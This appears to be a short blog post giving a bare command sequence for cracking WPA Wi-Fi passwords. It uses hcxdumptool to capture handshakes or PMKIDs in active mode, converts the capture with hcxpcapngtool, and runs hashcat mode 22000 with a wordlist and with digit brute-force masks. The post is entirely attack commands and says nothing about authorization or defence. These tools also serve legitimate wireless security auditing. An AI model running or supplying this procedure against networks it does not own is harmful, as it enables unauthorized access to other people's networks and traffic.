How to Crack WPA with hashcat a quicky dirty.

  • sudo systemctl stop NetworkManager.service
  • sudo systemctl stop wpa_supplicant.service
  • sudo hcxdumptool -i wlan0 -o dumpfile.pcapng –active_beacon –enable_status=15
  • sudo systemctl start wpa_supplicant.service
  • sudo systemctl start NetworkManager.service
  • hcxpcapngtool -o hash.hc22000 -E essidlist dumpfile.pcapng
  • hashcat -m 22000 hash.hc22000 wordlist.txt
  • hashcat.exe -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d
  • hashcat.exe -m 22000 hash.hc22000 -a 3 –increment –increment-min 8 –increment-max 18 ?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d?d

Comments

No comments yet. Why don’t you start the discussion?

Leave a Reply